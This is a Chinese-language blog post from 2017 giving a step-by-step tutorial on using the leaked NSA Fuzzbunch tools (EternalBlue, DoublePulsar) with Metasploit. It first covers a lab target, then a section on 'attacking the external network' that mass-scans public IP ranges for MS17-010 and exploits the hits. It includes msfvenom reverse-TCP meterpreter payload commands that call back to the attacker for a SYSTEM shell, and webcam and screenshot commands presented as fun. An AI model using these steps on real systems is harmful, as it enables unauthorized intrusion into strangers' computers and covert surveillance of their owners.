Shadow broker=>fuzzbunch+metasploit 攻击外网测试以及metasploit大批量扫描目标IP

0x01 前言

4月14日,影子经纪人在steemit.com上公开了一大批NSA(美国国家安全局)“方程式组织” (Equation Group)使用的极具破坏力的黑客工具,其中包括可以远程攻破全球约70%Windows机器的漏洞利用工具。一夜之间,全世界70%的windows服务器置于危险之中,国内使用windows服务器的高校、国企甚至政府机构也不能幸免。
据了解,受影响的Windows 版本包括Windows NT,Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0等。
正在使用这些Windows操作系统的你,有没有在颤抖!!虽然微软宣布已修复大部分的漏洞,但这场由于远程漏洞泄露造成的灾难性网络大地震“余震”仍在。
 
 成功的条件 靶机必须要关闭防火墙 且操作系统要低于win10 攻击机1 要关闭防火墙

0x02 fuzzbunch工具复现

攻击机1:win7 win8或者winxp(没测试过xp,应该也可以实现) ,并且要安装python2.6以及pywin32.exe     192.168.46.129
攻击机2:kali2.0 metasploit  192.168.46.131
靶机3:winxp   192.168.46.132
首先先运行工具包中的fb.py

然后需要输入你的攻击地址 也就是我们刚开始扫描的靶机

还有回调地址 输入win7的ip地址  重定向设置为 no  然后询问你是否创建文件 如果有则不创建 没有则创建文件 一路回车

use Eternalblue模块

然后一路回车到让你选择操作系统和模式 操作系统根据实际情况而定 但是模式要选择FB模式

一路回车 攻击

当出现win的时候说明攻击成功这时到攻击机2 kali上 先生成攻击文件并且将攻击文件上传至win7的目录下

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.71.130LPORT=5555 -f dll > go.dll

use exploit/multi/handler 模块 

将LHOST 设置成攻击机2 kali的ip 192.168.46.131

LPORT 设置为5555

exploit进行监听

返回攻击机1 win7

use doubleplusar模块

一路回车到

选择smb模式 x86系统 RunDLL 中填入开始生成文件的位置

一路回车 ATTACK

返回kali可以看到成功了

 

0x03 攻击外网

1.准备环境
攻击机1:vmware12.0中的win7+python2.6+pywin32win10+PentestBox-with-Metasploit
攻击机2:win10+PentestBox-with-Metasploit
2.win7连接外网
因为我们的目的是打外网,所以就需要win7也连接外网,首先将点击vmware左上角虚拟机中的设置选项,点击网络适配器,点击桥接模式,确定
 

然后点击编辑中的虚拟网络编辑器,点击更改设置,点桥接模式,确定,就可以连接另外一个宽带了

3.攻击机2准备工作

由于kaLi连接宽带比较麻烦,故我选择用本机win10系统作为攻击机2,这里安装PentestBox-with-Metasploit 这个软件是集成了metasploit,burpsuite等工具的测试环境,很好用,下载链接自行百度

然后 我们可以用msf大批量扫描网段  use auxiliary/scanner/smb/smb_ms17_010 这个模块

如果发现自己没有这个模块 在github上下载 https://github.com/rapid7/metasploit-framework/releases

然后将压缩包中 modules\auxiliary\scanner\smb\smb_ms17_010文件复制到pentestBox相应的地方就好了 这个模块就可以大批量扫描有这个漏洞 445端口的ip

可以用show options查看用法

set RHOST 设置你需要扫描的ip   111.111.111.1/24 

set RPORT 扫描端口 445

set THREADS 设置线程不要超过16  这里设置15

run 运行 就可以扫描了

黄色感叹号表示  可能有漏洞 可以利用

然后我们利用 use exploit/multi/handler  这个后门模块 监听自己的5555端口

将LHOST 设置成攻击机2 win10的ip

LPORT 设置为5555

exploit进行监听

4.攻击机1 win7准备工作

运行fb.py 

然后需要输入你的攻击地址 也就是我们刚开始扫描的靶机

还有回调地址 输入win7的ip地址  重定向设置为 no  然后询问你是否创建文件 如果有则不创建 没有则创建文件 一路回车

然后 use Eternalblue 也是一路按回车

这里会问你选择 winxp 还是win7win8 这个根据实际情况来定 一定要选择FB模式 

之后也是一路回车

 如果显示win的话表示成功

这里 use Doublepulsar模块 也是回车

选择SMB模式  x64位(操作系统位数) 这个也是根据情况来定

经过测试发现64位和32位的payload不一样payload生成方法 在kali中

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=攻击机2的地址LPORT=5555 -f dll > go_x64.dll  生成64位的dll文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击机2的地址LPORT=5555 -f dll > go_x32.dll  生成32位dll文件

并将文件放至攻击机1 win7的c盘目录下

之后我们就回车 进行攻击 成功的话攻击机1会弹shell而且是system权限

后面的自己就可以测试了介绍一些成功后的语句

webcam_list:这个命令可以查看目标机器上是否有网络摄像头,并且列举出来。

webcam_snap:这个命令主要是远程连接目标系统的摄像头。

 screenshot :桌面截图并且保存

等一系列好玩的

posted @ 2017-04-20 23:58  Mrsm1th  阅读(993)  评论(1编辑  收藏  举报